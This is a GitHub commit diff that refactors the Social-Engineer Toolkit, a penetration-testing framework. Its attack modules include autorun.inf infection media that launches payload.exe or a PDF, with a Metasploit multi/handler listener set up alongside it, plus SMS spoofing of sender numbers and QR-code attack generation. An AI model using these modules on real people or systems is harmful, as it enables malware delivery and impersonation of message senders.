Merge pull request #255 from Cabalist/master

More Code Review
This commit is contained in:
trustedsec 2016-07-28 22:28:05 -04:00 committed by GitHub
commit b0541ca7bf
16 changed files with 819 additions and 1663 deletions

View file

@ -3,3 +3,7 @@ pycrypto
requests
pyopenssl
pefile
# Generate QR Codes
qrcode
pillow

View file

@ -1,4 +1,5 @@
#!/usr/bin/env python
# coding=utf-8
import sys
import os
@ -71,50 +72,54 @@ if os.path.isfile(filename):
try:
print("[*] Spawning SET in a threaded process...")
child = pexpect.spawn("python setoolkit")
fileopen = open(filename, "r")
for line in fileopen:
line = line.rstrip()
# if we just use enter send default
if line == "":
line = "default"
with open(filename) as fileopen:
for line in fileopen:
line = line.rstrip()
# if we just use enter send default
if line == "":
line = "default"
match1 = re.search("OMGPASSWORDHERE", line)
if match1:
line = line.replace("OMGPASSWORDHERE", "")
password = True
match1 = re.search("OMGPASSWORDHERE", line)
if match1:
line = line.replace("OMGPASSWORDHERE", "")
password = True
if password is False:
print("[*] Sending command {0} to the interface...".format(line))
if password is True:
print("[*] Sending command [**********] (password masked) to the interface...")
password = False
if password is False:
print("[*] Sending command {0} to the interface...".format(line))
if password is True:
print("[*] Sending command [**********] (password masked) to the interface...")
password = False
if line == "default":
line = ""
if line == "default":
line = ""
if line == "CONTROL-C-HERE":
try:
print("[*] This may take a few seconds while SET catches up...")
child.expect("Next line of the body:")
time.sleep(2)
child.sendline("\n")
child.sendcontrol('c')
if line == "CONTROL-C-HERE":
try:
print("[*] This may take a few seconds while SET catches up...")
child.expect("Next line of the body:")
time.sleep(2)
child.sendline("\n")
child.sendcontrol('c')
# if the user is using pexpect < 2.3
except AttributeError:
print("[-] Error: You are running pexpect < 2.3 which is needed for this function")
choice = input("Would you like to install it now yes or no: ")
if choice == "yes" or choice == "y":
subprocess.Popen(
"wget http://sourceforge.net/projects/pexpect/files/pexpect/Release%202.3/pexpect-2.3.tar.gz;tar -zxvf pexpect-2.3.tar.gz;cd pexpect-2.3;python setup.py install;cd ..;rm -rf pexpect-2*", shell=True).wait()
try:
reload(pexpect)
child.sendcontrol('c')
except:
print("[*] Relaunch the Social-Engineer Toolkit for changes to apply.")
sys.exit()
if line != "CONTROL-C-HERE":
child.sendline(line)
# if the user is using pexpect < 2.3
except AttributeError:
print("[-] Error: You are running pexpect < 2.3 which is needed for this function")
choice = input("Would you like to install it now yes or no: ")
if choice == "yes" or choice == "y":
subprocess.Popen("wget http://sourceforge.net/projects/pexpect/files/pexpect/Release%202.3/pexpect-2.3.tar.gz;"
"tar -zxvf pexpect-2.3.tar.gz;"
"cd pexpect-2.3;"
"python setup.py install;"
"cd ..;"
"rm -rf pexpect-2*", shell=True).wait()
try:
reload(pexpect)
child.sendcontrol('c')
except:
print("[*] Relaunch the Social-Engineer Toolkit for changes to apply.")
sys.exit()
if line != "CONTROL-C-HERE":
child.sendline(line)
print("[*] Finished sending commands, interacting with the interface..")
child.interact()
@ -130,4 +135,4 @@ if os.path.isfile(filename):
# handle everything else
except Exception as e:
print("[*] Something went wrong, printing error: ", e)
print("[*] Something went wrong, printing error: {0}".format(e))

36
seproxy
View file

@ -7,6 +7,8 @@
import sys
import getpass
import os
import subprocess
import re
import src.core.setcore as core
@ -26,42 +28,34 @@ if operating_system == "posix":
definepath = os.getcwd()
print("\n[*] Welcome to the SET-Proxy Configuration Utility")
print("\nEnter the proxy setting informatiom below.\n\nExample: http://10.3.1.1:8080\n")
print("\nEnter the proxy setting information below.\n\nExample: http://10.3.1.1:8080\n")
try:
proxy = input("Enter the proxy server: ")
username = input(
"Enter the username for the proxy (hit enter for none): ")
password = getpass.getpass(
"Enter the password for the proxy (hit enter for none): ")
username = input("Enter the username for the proxy (hit enter for none): ")
password = getpass.getpass("Enter the password for the proxy (hit enter for none): ")
except KeyboardInterrupt:
print("\n[!] Exiting the Social-Engineer Toolkit.")
sys.exit()
if username != "":
proxy_string = "export http_proxy='http://%s:%s@%s'" % (
username, password, proxy)
proxy_string = "export http_proxy='http://{0}:{1}@{2}'".format(username, password, proxy)
else:
proxy_string = "export http_proxy='http://{0}'".format(proxy)
if username == "":
proxy_string = "export http_proxy='http://%s'" % (proxy)
filewrite = open(core.setdir + "/proxy.config", "w")
filewrite.write(proxy_string)
filewrite.close()
from src.core.set import *
with open(os.path.join(core.setdir, "/proxy.config"), "w") as filewrite:
filewrite.write(proxy_string)
def kill_proc(port, flag):
proc = subprocess.Popen("netstat -antp | grep '%s'" % (port), shell=True, stdout=subprocess.PIPE)
proc = subprocess.Popen("netstat -antp | grep '{0}'".format(port), shell=True, stdout=subprocess.PIPE)
stdout_value = proc.communicate()[0]
a = re.search("\d+/%s" % (flag), stdout_value)
a = re.search("\d+/{0}".format(flag), stdout_value)
if a:
b = a.group()
b = b.replace("/%s" % (flag), "")
subprocess.Popen("kill -9 %s 1> /dev/null 2> /dev/null" %
(b), shell=True).wait()
b = b.replace("/{0}".format(flag), "")
subprocess.Popen("kill -9 {0} 1> /dev/null 2> /dev/null".format(b), shell=True).wait()
# cleans up stale processes from SET
try:
@ -72,7 +66,7 @@ if operating_system == "posix":
# handle errors
except Exception as error:
log(error)
core.log(error)
else:
print("[!] Sorry, this only works on posix (nix) based systems and is not compatible with this operating system.")

102
setoolkit
View file

@ -1,4 +1,5 @@
#!/usr/bin/env python
# coding=utf-8
import os
import re
import shutil
@ -37,7 +38,8 @@ if not os.path.isfile("/etc/setoolkit/set.config"):
shutil.copyfile("src/core/config.baseline", "/etc/setoolkit/set.config")
# here we check to ensure we have the latest version
data = open("/etc/setoolkit/set.config", "r").read()
with open("/etc/setoolkit/set.config") as fileopen:
data = fileopen.read()
if "CONFIG_VERSION=7.2" not in data:
print("[*] Overwriting old config for updates to SET. Backing up your old one in /etc/setoolkit/")
shutil.move("/etc/setoolkit/set.config", "/etc/setoolkit/set.config.bak")
@ -48,7 +50,8 @@ import src.core.setcore as core
from src.core.menu import text
from src.core.update_config import update_config
if os.path.isfile(core.setdir + "/version.lock"): os.remove(core.setdir + "/version.lock")
if os.path.isfile(os.path.join(core.setdir, "version.lock")):
os.remove(os.path.join(core.setdir, "version.lock"))
# check directory and make it
if not os.path.isdir("src/logs/"):
@ -57,9 +60,8 @@ if not os.path.isdir("src/logs/"):
# check set logfile
if not os.path.isfile("src/logs/set_logfile.log"):
# create new log
filewrite = open("src/logs/set_logfile.log", "w")
filewrite.write("")
filewrite.close()
with open("src/logs/set_logfile.log", "w") as filewrite:
filewrite.write("")
# check which operating system
operating_system = core.check_os()
@ -74,15 +76,12 @@ if operating_system == "posix":
if not os.path.isdir(userdir):
os.makedirs(userdir)
if not os.path.isdir(core.setdir + "/reports/"):
os.makedirs(core.setdir + "/reports")
if not os.path.isdir(os.path.join(core.setdir, "reports")):
os.makedirs(os.path.join(core.setdir, "reports"))
# check to see if we have python-pycrypto
try:
from Crypto.Cipher import AES
except ImportError:
print("[!] The python-pycrypto python module not installed. You will lose the ability to use multi-pyinjector.")
pass
@ -102,9 +101,13 @@ update_config()
# chmod routine
if operating_system == "posix":
# change permissions if nix
subprocess.Popen(
"chmod +x seautomate;chmod +x set-update;chmod +x setup.py;chmod +x set-proxy;chmod +x src/payloads/ratte/ratteserver;chmod +x src/payloads/set_payloads/listener.py",
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
subprocess.Popen("chmod +x seautomate;"
"chmod +x set-update;"
"chmod +x setup.py;"
"chmod +x set-proxy;"
"chmod +x src/payloads/ratte/ratteserver;"
"chmod +x src/payloads/set_payloads/listener.py",
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
dns = core.check_config("DNS_SERVER=")
if dns.lower() == "on":
@ -114,8 +117,7 @@ if dns.lower() == "on":
for root, dirs, files in os.walk(core.setdir):
for f in files:
try:
match = re.search(
".svn|entries|all-wcprops|props|text-base|prop-base|tmp", f)
match = re.search(".svn|entries|all-wcprops|props|text-base|prop-base|tmp", f)
if not match:
os.unlink(os.path.join(root, f))
@ -125,8 +127,7 @@ for root, dirs, files in os.walk(core.setdir):
# loop through all the directories
for d in dirs:
try:
match = re.search(
".svn|entries|all-wcprops|props|text-base|prop-base|tmp", d)
match = re.search(".svn|entries|all-wcprops|props|text-base|prop-base|tmp", d)
if not match:
shutil.rmtree(os.path.join(root, d))
except:
@ -135,9 +136,9 @@ for root, dirs, files in os.walk(core.setdir):
# if windows then do some stuff
if operating_system == "posix":
#
# ROOT CHECK
#
#
# ROOT CHECK
#
if os.geteuid() != 0:
print("\n The Social-Engineer Toolkit (SET) - by David Kennedy (ReL1K)")
@ -152,32 +153,38 @@ define_version = core.get_version()
core.cleanup_routine()
# create the set.options routine
filewrite = open(core.setdir + "/set.options", "w")
filewrite.write("{This is the main SET configuration file for all options used in SET}\n")
filewrite.close()
with open(os.path.join(core.setdir, "/set.options"), "w") as filewrite:
filewrite.write("{This is the main SET configuration file for all options used in SET}\n")
try:
# Remove old Signed_Updates
if os.path.isfile(core.setdir + "/Signed_Update.jar"):
os.remove(core.setdir + "/Signed_Update.jar")
if os.path.isfile(os.path.join(core.setdir, "/Signed_Update.jar")):
os.remove(os.path.join(core.setdir, "/Signed_Update.jar"))
# initial user menu
if not os.path.isfile("src/agreement4"):
fileopen = open("readme/LICENSE", "r")
for line in fileopen:
print((line.rstrip()))
with open("readme/LICENSE") as fileopen:
for line in fileopen:
print((line.rstrip()))
print((core.bcolors.RED + """
The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting yes (only one time), you agree to the terms of service and that you will only use this tool for lawful purposes only.""" + core.bcolors.GREEN))
print("{0}The Social-Engineer Toolkit is designed purely"
" for good and not evil. If you are planning on "
"using this tool for malicious purposes that are "
"not authorized by the company you are performing "
"assessments for, you are violating the terms of "
"service and license of this toolset. By hitting "
"yes (only one time), you agree to the terms of "
"service and that you will only use this tool for "
"lawful purposes only.{1}".format(core.bcolors.RED, core.bcolors.ENDC))
print(core.bcolors.GREEN)
choice = input("\nDo you agree to the terms of service [y/n]: ")
choice += " " # b/c method below
if choice[0].lower() == "y":
filewrite = open("src/agreement4", "w")
filewrite.write("user accepted")
filewrite.close()
with open("src/agreement4", "w") as filewrite:
filewrite.write("user accepted")
print(core.bcolors.ENDC)
else:
print((core.bcolors.ENDC + "[!] Exiting the Social-Engineer Toolkit, have a nice day." + core.bcolors.ENDC))
print(core.bcolors.ENDC + "[!] Exiting the Social-Engineer Toolkit, have a nice day." + core.bcolors.ENDC)
sys.exit()
while True:
@ -192,10 +199,8 @@ The Social-Engineer Toolkit is designed purely for good and not evil. If you are
# funny
if main_menu_choice == "hugs":
core.print_warning(
"Have you given someone a hug today? Remember a hug can change the world.")
pause = input(
"\nPlease give someone a hug then press {return} to continue.")
core.print_warning("Have you given someone a hug today? Remember a hug can change the world.")
pause = input("\nPlease give someone a hug then press {return} to continue.")
# funny2
if main_menu_choice == "freehugs":
@ -204,21 +209,17 @@ The Social-Engineer Toolkit is designed purely for good and not evil. If you are
# funny3
if main_menu_choice == "derbycon":
core.print_warning(
core.bcolors.BOLD + "YAYYYYYYYYYYYYYYYYYYYYYY DerbyCon.\n\nDerbyCon 6.0 'Recharge' -- September 23th - 25th 2016" + core.bcolors.ENDC)
pause = input(
core.bcolors.BOLD + "\nDon't miss it! Sep 23 - Sep 25th! Press {return} to continue." + core.bcolors.ENDC)
core.print_warning(core.bcolors.BOLD + "YAYYYYYYYYYYYYYYYYYYYYYY DerbyCon.\n\nDerbyCon 6.0 'Recharge' -- September 23th - 25th 2016" + core.bcolors.ENDC)
pause = input(core.bcolors.BOLD + "\nDon't miss it! Sep 23 - Sep 25th! Press {return} to continue." + core.bcolors.ENDC)
# rance
if main_menu_choice == "rance":
core.print_warning(
core.bcolors.BOLD + "We miss you buddy. David Jones (Rance) changed a lot of us and you'll always be apart of our lives (and SET). Fuck Cancer." + core.bcolors.ENDC)
core.print_warning(core.bcolors.BOLD + "We miss you buddy. David Jones (Rance) changed a lot of us and you'll always be apart of our lives (and SET). Fuck Cancer." + core.bcolors.ENDC)
pause = input("Press {return} to continue.")
# cavs
if main_menu_choice == "cavs":
core.print_warning(
core.bcolors.BOLD + "2015-2016 CHAMPS BABY!!! C l e e e e e e v eeee l a a n n d d d d d d d d d d d " + core.bcolors.ENDC)
core.print_warning(core.bcolors.BOLD + "2015-2016 CHAMPS BABY!!! C l e e e e e e v eeee l a a n n d d d d d d d d d d d " + core.bcolors.ENDC)
pause = input("Press {return} to continue.")
# quit out
@ -268,13 +269,14 @@ The Social-Engineer Toolkit is designed purely for good and not evil. If you are
# handle keyboard interrupts
except KeyboardInterrupt:
print(("\n\nThank you for " + core.bcolors.RED + "shopping" + core.bcolors.ENDC +
" with the Social-Engineer Toolkit.\n\nHack the Gibson...and remember...hugs are worth more than handshakes.\n"))
print(("\n\nThank you for {0}shopping{1} with the Social-Engineer Toolkit."
"\n\nHack the Gibson...and remember...hugs are worth more "
"than handshakes.\n".format(core.bcolors.RED, core.bcolors.ENDC)))
# handle exceptions
except Exception as error:
log(error)
print ("\n\n[!] Something went wrong, printing the error: "+ str(error))
core.log(error)
print("\n\n[!] Something went wrong, printing the error: " + str(error))
# cleanup routine
core.cleanup_routine()

View file

@ -1,4 +1,5 @@
#!/usr/bin/env python
# coding=utf-8
#
# Python installer
#
@ -36,19 +37,19 @@ if platform.system() == "Linux":
if os.path.isfile("/etc/apt/sources.list"):
# force install of debian packages
subprocess.Popen(
"apt-get --force-yes -y install git apache2 python-requests libapache2-mod-php python-pymssql build-essential python-pexpect python-pefile python-crypto python-openssl", shell=True).wait()
subprocess.Popen("apt-get --force-yes -y install "
"git apache2 python-requests libapache2-mod-php "
"python-pymssql build-essential python-pexpect "
"python-pefile python-crypto python-openssl", shell=True).wait()
# If pacman.conf exists, we have a Arch based system
elif os.path.isfile("/etc/pacman.conf"):
subprocess.Popen(
"pacman -S --noconfirm --needed git python2 python2-beautifulsoup3 python2-pexpect python2-crypto", shell=True).wait()
subprocess.Popen(
"wget https://pefile.googlecode.com/files/pefile-1.2.10-139.tar.gz", shell=True).wait()
subprocess.Popen(
"tar xvfz pefile-1.2.10-139.tar.gz", shell=True).wait()
subprocess.Popen(
"chmod a+x pefile-1.2.10-139/setup.py", shell=True).wait()
subprocess.Popen("pacman -S --noconfirm --needed git python2 "
"python2-beautifulsoup3 python2-pexpect python2-crypto", shell=True).wait()
subprocess.Popen("wget https://pefile.googlecode.com/files/pefile-1.2.10-139.tar.gz", shell=True).wait()
subprocess.Popen("tar xvfz pefile-1.2.10-139.tar.gz", shell=True).wait()
subprocess.Popen("chmod a+x pefile-1.2.10-139/setup.py", shell=True).wait()
subprocess.Popen("rm -rf pefile-1.2.10-139*", shell=True).wait()
# if dnf.conf is there, we are dealing with a >= fedora 22 - added thanks to whoismath pr
@ -58,14 +59,12 @@ if platform.system() == "Linux":
# if sources.list or pacman.conf is not available then we're running
# something offset
else:
print(
"[!] You're not running a Debian, Fedora or Arch variant. Installer not finished for this type of Linux distro.")
print("[!] You're not running a Debian, Fedora or Arch variant. Installer not finished for this type of Linux distro.")
print("[!] Install git, python-pexpect, python-crypto, python-openssl, python-pefile manually for all of SET dependancies.")
sys.exit()
if os.path.isdir("/usr/share/setoolkit"):
print(
"[!] SET is already installed in /usr/share/setoolkit. Remove and start again.")
print("[!] SET is already installed in /usr/share/setoolkit. Remove and start again.")
sys.exit()
if not os.path.isfile("/usr/bin/git"):
@ -77,14 +76,10 @@ if platform.system() == "Linux":
cwdpath = os.getcwd()
subprocess.Popen("cd ..;cp -rf %s /usr/share/setoolkit" % cwdpath, shell=True).wait()
print("[*] Installing setoolkit installer to /usr/bin/setoolkit...")
subprocess.Popen(
"echo #!/bin/bash > /usr/bin/setoolkit", shell=True).wait()
subprocess.Popen(
"echo cd /usr/share/setoolkit >> /usr/bin/setoolkit", shell=True).wait()
subprocess.Popen(
"echo exec python2 setoolkit $@ >> /usr/bin/setoolkit", shell=True).wait()
subprocess.Popen(
"cp /usr/share/setoolkit/seupdate /usr/bin/", shell=True).wait()
subprocess.Popen("echo #!/bin/bash > /usr/bin/setoolkit", shell=True).wait()
subprocess.Popen("echo cd /usr/share/setoolkit >> /usr/bin/setoolkit", shell=True).wait()
subprocess.Popen("echo exec python2 setoolkit $@ >> /usr/bin/setoolkit", shell=True).wait()
subprocess.Popen("cp /usr/share/setoolkit/seupdate /usr/bin/", shell=True).wait()
subprocess.Popen("chmod +x /usr/bin/setoolkit", shell=True).wait()
#print("[*] Note you will manually need to install Core Security 'Impacket'")
#print("[*] Download link: http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Impacket")
@ -93,9 +88,8 @@ if platform.system() == "Linux":
print("[*] We are now finished! To run SET, type setoolkit...")
if platform.system() == 'Darwin':
subprocess.Popen(
"easy_install pexpect pycrypto pyopenssl pefile", shell=True).wait()
subprocess.Popen("easy_install pexpect pycrypto pyopenssl pefile", shell=True).wait()
if platform.system() != "Linux":
if platform.system() != "Darwin":
print("[!] Sorry this installer is not designed for any other system other than Linux and Mac. Please install the Python dependencies manually.")
if platform.system() not in ["Linux", "Darwin"]:
print("[!] Sorry this installer is not designed for any other system other "
"than Linux and Mac. Please install the Python dependencies manually.")

View file

@ -1,11 +1,11 @@
#!/usr/bin/env python
# coding=utf-8
#
# simple git update for set pulling from core modules
#
import os
import sys
import src.core.setcore as core
# check where we are and load default directory
@ -14,17 +14,17 @@ if os.path.isdir("/usr/share/setoolkit"):
os.chdir("/usr/share/setoolkit")
sys.path.append("/usr/share/setoolkit")
import src.core.setcore as core
# if we can't see our config then something didn't go good..
if not os.path.isfile("/etc/setoolkit/set.config"):
core.print_error("Cannot locate SET executable. Try running from the local directory.")
core.print_error("If this does not work, please run the setup.py install file.")
sys.exit()
from src.core.setcore import *
try:
# pull update set from the core libraries
update_set()
core.update_set()
# except keyboard interrupts
except KeyboardInterrupt:
@ -32,4 +32,4 @@ except KeyboardInterrupt:
# handle all other errors
except Exception as e:
print("\n[!] Something went wrong.. Printing the error: {}".format(e))
print("\n[!] Something went wrong.. Printing the error: {0}".format(e))

View file

@ -1,83 +1,93 @@
#!/usr/bin/env python
# coding=utf-8
# simple autorun creation for set
import subprocess
import os
import re
import sys
from src.core.setcore import *
import subprocess
from time import sleep
import src.core.setcore as core
# define metasploit path
definepath = os.getcwd()
msf_path = meta_path()
me = mod_name()
msf_path = core.meta_path()
me = core.mod_name()
autorun_path = os.path.join(core.setdir, "autorun")
trigger = 0
if check_options("INFECTION_MEDIA=") == "ON":
if core.check_options("INFECTION_MEDIA=") == "ON":
trigger = 1
subprocess.Popen("rm -rf %s/autorun/ 1> /dev/null 2> /dev/null;mkdir %s/autorun 1> /dev/null 2> /dev/null;cp %s/payload.exe %s/autorun/program.exe 1> /dev/null 2> /dev/null" %
(setdir, setdir, setdir, setdir), shell=True).wait()
subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;"
"mkdir {0} 1> /dev/null 2> /dev/null;"
"cp {1} {2} 1> /dev/null 2> /dev/null".format(autorun_path,
os.path.join(core.setdir, "payload.exe"),
os.path.join(autorun_path, "program.exe")),
shell=True).wait()
if os.path.isfile(setdir + "/fileformat.file"):
if os.path.isfile(os.path.join(core.setdir, "fileformat.file")):
trigger = 2
subprocess.Popen("rm -rf %s/autorun/ 1> /dev/null 2> /dev/null;mkdir autorun 1> /dev/null 2> /dev/null;cp %s/template.pdf autorun/ 1> /dev/null 2>/dev/null" %
(setdir, setdir), shell=True).wait()
subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;"
"mkdir {0} 1> /dev/null 2> /dev/null;"
"cp {1} {0} 1> /dev/null 2>/dev/null".format(autorun_path,
os.path.join(core.setdir, "template.pdf")),
shell=True).wait()
if os.path.isfile(setdir + "/dll/openthis.wab"):
subprocess.Popen("rm -rf %s/autorun/ 1> /dev/null 2> /dev/null;mkdir autorun 1> /dev/null 2> /dev/null;cp %s/dll/* autorun/ 1> /dev/null 2> /dev/null" %
(setdir, setdir), shell=True).wait()
if os.path.isfile(os.path.join(core.setdir, "/dll/openthis.wab")):
subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;"
"mkdir {0} 1> /dev/null 2> /dev/null;"
"cp {1} {0} 1> /dev/null 2> /dev/null".format(autorun_path,
os.path.join(core.setdir, "/dll/*")),
shell=True).wait()
trigger = 3
if not os.path.isdir(setdir + "/autorun"):
os.makedirs(setdir + "/autorun/")
filewrite = open(setdir + "/autorun/autorun.inf", "w")
if not os.path.isdir(autorun_path):
os.makedirs(autorun_path)
# if using standard payloads
if trigger == 1:
payload = "program.exe" # "" + alpha_data + "\""
with open(os.path.join(autorun_path, "autorun.inf"), 'w') as filewrite:
# if using standard payloads
if trigger == 1:
payload = "program.exe" # "" + alpha_data + "\""
# if using pdf payload
if trigger == 2:
payload = "template.pdf"
# if using pdf payload
elif trigger == 2:
payload = "template.pdf"
if trigger == 3:
payload = "openthis.wab"
elif trigger == 3:
payload = "openthis.wab"
filewrite.write("""[autorun]
open=%s
icon=autorun.ico""" % (payload))
filewrite.close()
print_status(
"Your attack has been created in the SET home directory (/root/.set/) folder 'autorun'")
print_status(
"Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed.")
print_info("Copy the contents of the folder to a CD/DVD/USB to autorun")
else:
payload = ""
filewrite.write("""[autorun]\nopen={0}\nicon=autorun.ico""".format(payload))
core.print_status("Your attack has been created in the SET home directory (/root/.set/) folder 'autorun'")
core.print_status("Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed.")
core.print_info("Copy the contents of the folder to a CD/DVD/USB to autorun")
# if we want to launch payload and automatically create listener
if trigger == 1 or trigger == 2 or trigger == 3:
choice1 = yesno_prompt("0", "Create a listener right now [yes|no]")
if trigger in [1, 2, 3]:
choice1 = core.yesno_prompt("0", "Create a listener right now [yes|no]")
if choice1.lower() == "yes" or choice1.lower() == "y":
# if we used something to create other than solo.py then write out the
# listener
if not os.path.isfile(setdir + "/meta_config"):
filewrite = open(setdir + "/meta_config", "w")
fileopen = open(setdir + "/payload.options", "r")
for line in fileopen:
line = line.split(" ")
filewrite.write("use multi/handler\n")
filewrite.write("set payload " + line[0] + "\n")
filewrite.write("set lhost " + line[1] + "\n")
filewrite.write("set lport " + line[2] + "\n")
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\r\n\r\n")
filewrite.close()
if not os.path.isfile(os.path.join(core.setdir, "meta_config")):
with open(os.path.join(core.setdir, "meta_config"), 'w') as filewrite, \
open(os.path.join(core.setdir, "payload.options")) as fileopen:
for line in fileopen:
line = line.split(" ")
filewrite.write("use multi/handler\n")
filewrite.write("set payload {0}\n".format(line[0]))
filewrite.write("set lhost {0}\n".format(line[1]))
filewrite.write("set lport {0}\n".format(line[2]))
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\r\n\r\n")
# create the listener
print_status(
"Launching Metasploit.. This could take a few. Be patient! Or else no shells for you..")
subprocess.Popen("%smsfconsole -r %s/meta_config" %
(msf_path, setdir), shell=True).wait()
core.print_status("Launching Metasploit.. This could take a few. Be patient! Or else no shells for you..")
subprocess.Popen("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"),
os.path.join(core.setdir, "meta_config")),
shell=True).wait()
else:
print_warning("cancelling...")
core.print_warning("cancelling...")
sleep(2)

File diff suppressed because it is too large Load diff

View file

@ -1,21 +1,26 @@
from src.qrcode.qrcode import *
from src.core.setcore import *
# coding=utf-8
import os
import time
import src.core.setcore as core
import qrcode
# generate the qrcode and save it definition
def gen_qrcode(url):
# generate the qrcode
qr = QRCode(5, QRErrorCorrectLevel.L)
qr.addData(url)
qr = qrcode.QRCode(5, error_correction=qrcode.constants.ERROR_CORRECT_L)
qr.add_data(url)
qr.make()
im = qr.makeImage()
im = qr.make_image()
time.sleep(1)
if os.path.isfile(setdir + "/reports/qrcode_attack.png"):
os.remove(setdir + "/reports/qrcode_attack.png")
qr_img_path = os.path.join(core.setdir, "reports/qrcode_attack.png")
if os.path.isfile(qr_img_path):
os.remove(qr_img_path)
# save the image out
im.save(setdir + "/reports/qrcode_attack.png", format='png')
im.save(qr_img_path, format='png')
# print that its been successful
print_status(
"QRCode has been generated under %s/reports/qrcode_attack.png!" % (setdir))
core.print_status("QRCode has been generated under {0}".format(qr_img_path))

View file

@ -1,35 +1,79 @@
#!/usr/bin/env python
# coding=utf-8
from src.sms.protectedapi import send_sms
import src.core.setcore as core
try:
from src.core.setcore import *
from src.sms.protectedapi import send_sms
import requests
print("""\n ----- The Social-Engineer Toolkit (SET) SMS Spoofing Attack Vector -----\n""")
print("This attack vector relies upon a third party service called www.spoofmytextmessage.com. This is a third party service outside of the control from the Social-Engineer Toolkit. The fine folks over at spoofmytextmessage.com have provided an undocumented API for us to use in order to allow SET to perform the SMS spoofing. You will need to visit https://www.spoofmytextmessage.com and sign up for an account. They example multiple payment methods such as PayPal, Bitcoin, and many more options. Once you purchase your plan that you want, you will need to remember your email address and password used for the account. SET will then handle the rest.\n")
print("In order for this to work you must have an account over at spoofmytextmessage.com\n")
print("Special thanks to Khalil @sehnaoui for testing out the service for me and finding spoofmytextmessage.com\n")
print_error("DISCLAIMER: By submitting yes, you understand that you accept all terms and services from spoofmytextmessage.com and you are fully aware of your countries legal stance on SMS spoofing prior to performing any of these. By accepting yes you fully acknowledge these terms and will not use them for unlawful purposes.")
message = raw_input("\nDo you accept these terms (yes or no): ")
if message == "yes":
print_status("Okay! Moving on - SET needs some information from you in order to spoof the message.")
email = raw_input(setprompt(["7"], "Enter your email address for the spoofmytextmessage.com account"))
pw = raw_input(setprompt(["7"], "Enter your password for the spoofmytextmessage.com account"))
print_status("The next section requires a country code, this is the code you would use to dial to the specific country, for example if I was sending a message to 555-555-5555 to the United States (or from) you would enter +1 below.")
tocountry = raw_input(setprompt(["7"], "Enter the country code for the number you are sending TO (for example U.S would be '+1')[+1]"))
if tocountry == "": tocountry = "+1"
fromcountry = raw_input(setprompt(["7"], "Enter the country code for the number you are sending FROM (for example U.S. would be '+1')[+1]"))
if fromcountry == "": fromcountry = "+1"
tonumber = raw_input(setprompt(["7"], "Enter the number to send the SMS TO - be sure to include country code (example: +15551234567)"))
fromnumber = raw_input(setprompt(["7"], "Enter the number you want to come FROM - be sure to include country code (example: +15551234567)"))
message = raw_input(setprompt(["7"], "Enter the message you want to send via the text message"))
# note that the function for this is in a compiled python file with no source - this was done at the request of the third party we use since the API is not documented. I hand wrote the code and can validate its authenticity - it imports python requests and json and uses that to interact with the API. From a security standpoint if you are uncomfortable using this - feel free to ping me and I can walk you through what I do without giving away the API from the third party.
send_sms(email, pw, tocountry, fromcountry, fromnumber, tonumber, message)
else:
print_status("Okay! Exiting out of the Social-Engineer Toolkit SMS Spoofing Attack Vector...")
except ImportError:
print_error("Looks like you dont have python-requests installed. Please install (apt-get install python-requests) and try again.")
core.print_error("Looks like you dont have python-requests installed. "
"Please install (apt-get install python-requests) and try again.")
print("Press {return} to continue.")
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
print("""\n ----- The Social-Engineer Toolkit (SET) SMS Spoofing Attack Vector -----\n""")
print("This attack vector relies upon a third party service called www.spoofmytextmessage.com. "
"This is a third party service outside of the control from the Social-Engineer Toolkit. "
"The fine folks over at spoofmytextmessage.com have provided an undocumented API for us "
"to use in order to allow SET to perform the SMS spoofing. You will need to visit "
"https://www.spoofmytextmessage.com and sign up for an account. They example multiple "
"payment methods such as PayPal, Bitcoin, and many more options. Once you purchase your "
"plan that you want, you will need to remember your email address and password used for "
"the account. SET will then handle the rest.\n")
print("In order for this to work you must have an account over at spoofmytextmessage.com\n")
print("Special thanks to Khalil @sehnaoui for testing out the service for me and finding "
"spoofmytextmessage.com\n")
core.print_error("DISCLAIMER: By submitting yes, you understand that you accept all terms and "
"services from spoofmytextmessage.com and you are fully aware of your countries "
"legal stance on SMS spoofing prior to performing any of these. By accepting yes "
"you fully acknowledge these terms and will not use them for unlawful purposes.")
message = input("\nDo you accept these terms (yes or no): ")
if message == "yes":
core.print_status("Okay! Moving on - SET needs some information from you in order to spoof the message.")
email = input(core.setprompt(["7"], "Enter your email address for the spoofmytextmessage.com account"))
pw = input(core.setprompt(["7"], "Enter your password for the spoofmytextmessage.com account"))
core.print_status("The next section requires a country code, this is the code you would use to dial "
"to the specific country, for example if I was sending a message to 555-555-5555 to "
"the United States (or from) you would enter +1 below.")
tocountry = input(core.setprompt(["7"], "Enter the country code for the number you are sending TO "
"(for example U.S would be '+1')[+1]"))
if tocountry == "":
tocountry = "+1"
fromcountry = input(core.setprompt(["7"], "Enter the country code for the number you are sending FROM "
"(for example U.S. would be '+1')[+1]"))
if fromcountry == "":
fromcountry = "+1"
tonumber = input(core.setprompt(["7"], "Enter the number to send the SMS TO - be sure to include "
"country code (example: +15551234567)"))
fromnumber = input(core.setprompt(["7"], "Enter the number you want to come FROM - be sure to include "
"country code (example: +15551234567)"))
message = input(core.setprompt(["7"], "Enter the message you want to send via the text message"))
# note that the function for this is in a compiled python file with no source -
# this was done at the request of the third party we use since the API is not documented.
# I hand wrote the code and can validate its authenticity - it imports python requests
# and json and uses that to interact with the API. From a security standpoint if you are
# uncomfortable using this - feel free to ping me and I can walk you through what I do
# without giving away the API from the third party.
send_sms(email, pw, tocountry, fromcountry, fromnumber, tonumber, message)
else:
core.print_status("Okay! Exiting out of the Social-Engineer Toolkit SMS Spoofing Attack Vector...")

File diff suppressed because one or more lines are too long

View file

@ -1,8 +1,19 @@
#!/usr/bin/python
import pexpect
from src.core.setcore import *
# coding=utf-8
import os
import time
import pexpect
import src.core.setcore as core
